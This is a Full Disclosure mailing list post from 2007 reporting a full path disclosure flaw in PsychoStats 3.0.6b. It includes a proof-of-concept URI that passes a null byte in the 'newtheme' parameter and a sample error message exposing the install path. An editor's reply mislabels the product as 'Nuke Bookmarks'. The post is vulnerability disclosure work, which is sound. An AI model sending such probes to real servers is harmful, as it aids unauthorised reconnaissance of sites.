Full Disclosure mailing list archives

Re: PsychoStats 3.0.6b and prior

From: gahmad () securityfocus com
Date: Fri, 18 May 2007 03:12:29 -0600 (MDT)

in tech: Nuke Bookmarks is a web-based application to game statistics for 
players.

exploitability: functional

numbers are missing in attack scenarios.

'The following proof of concept URIs were supplied: '
- URI was

rest is good.

On Fri, 18 May 2007, kefka wrote:

newtheme variable only expects "sane" behaivor, no arguement or an
arguement with any special character, etc.. will cause it to error and
display the full path to $pathtohlstats/includes/smarty/Smarty.class.php

$pathtohlstats/server.php?newcss=styles.css&newtheme=%00

Ex: Warning: Smarty error: unable to read resource: "server.html" in
$pathtohlstats/includes/smarty/Smarty.class.php on line 1088


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Current thread:

PsychoStats 3.0.6b and prior kefka (May 18)
- Re: PsychoStats 3.0.6b and prior gahmad (May 18)
  - Re: PsychoStats 3.0.6b and prior kefka (May 18)